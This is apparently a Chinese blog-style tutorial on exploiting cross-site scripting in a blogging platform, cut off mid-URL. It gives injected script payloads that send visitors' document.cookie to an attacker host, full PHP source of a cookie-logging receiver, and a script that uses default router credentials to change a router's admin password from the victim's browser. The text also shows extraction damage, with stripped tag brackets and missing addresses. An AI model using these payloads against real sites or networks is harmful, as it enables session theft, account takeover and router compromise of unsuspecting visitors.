跨站脚本攻击实例答题.docVIP

跨站脚本攻击实例解析 作者：泉哥 主页： 前言 跨站攻击，即Cross Site Script Execution(通常简写为XSS，因为CSS与层叠样式表img src=# onerror=alert(head)/img，为便于区别，我将提示语句更改为对应的名称，前三项在首页可触发脚本，后两项需打开文章才可触发，测试结果如图1、2所示： 图1（在首页触发） 图2（打开文章触发） 对于其它网站的测试基本也是大同小异，除了手工测试外，你还可使用其它一些自动扫描工具，比如Acunetix Web Scanner…… 漏洞利用 一、窃取Cookie 对于跨站的攻击方法，使用最多的莫过于cookie窃取了，获取cookie后直接借助“明小子”工具或其它可修改cookie的浏览器（如装有Cookies Edit插件的Firefox）将cookie修改为获取的cookie，这样即可获得博客的管理权限。 首先，我们在自定义模板的head代码模块中写入 scriptdocument.write(img src=http://localhost/test.php?cookie=+document.cookie+ width=0 height=0 border=0 /);/script 或者 scriptdocument.location = http://localhost/test.php?cookie= + document.cookie;/script 这里我把脚本放在本机上，你可以根据脚本地址来更改上面的localhost地址。以上两个均可达到同等效果，但就隐蔽性而言，前者的隐蔽性会更强些，读者可自行选择，当然也有其它语句可达到一样的目的，就看你如何发挥了。接下来我们来编写上面的test.php文件，它主要用于获取对方的cookie，其源代码如下： ?php $cookie = $_GET[cookie]; //以GET方式获取cookie变量值 $ip = getenv (REMOTE_ADDR); //远程主机IP地址 $time=date(Y-m-d g:i:s); //以年-月-日 时：分：秒的格式显示时间 $referer=getenv (HTTP_REFERER); //链接来源 $agent = $_SERVER[HTTP_USER_AGENT]; //用户浏览器类型 $fp = fopen(cookie.txt, a); //打开cookie.txt，若不存在则创建它 fwrite($fp, IP: .$ip. \n Date and Time: .$time. \n User Agent:.$agent.\n Referer: .$referer.\n Cookie: .$cookie.\n\n\n); //写入文件 fclose($fp); //关闭文件 header(Location: ); //将网页重定向到百度，增强性 ? 为测试地址，访问后我们打开http://localhost/cookie.txt 看看cookie.txt 文件是否被创建并写入数据，结果如图3所示： 图3 很明显，我们已经成功窃取到cookie了，剩下的事相信大家都知道，这里就不再赘述。 二．渗透路由器 对于处于内网中的用户，我们可以利用XSS来更改路由器密码。我们可以借助默认的密码来登陆路由器，比如URL：http://admin:admin@，其实很多路由器都是使用默认密码，我这里这台也是如此，直接以admin作为用户名和密码。首先我们先利用Firefox插件Live HTTP headers获取请求头，如图4所示： 图4 因此我们可以在head代码模块中写入以下语句： script src=http://localhost/1.js/script 其中1.js源码如下： window.open(http://admin:admin@/userRpm/ChangeLoginPwdRpm.htm?oldname=adminoldpassword=adminnewname=administratornewpassword=passwordnewpassword2=passwo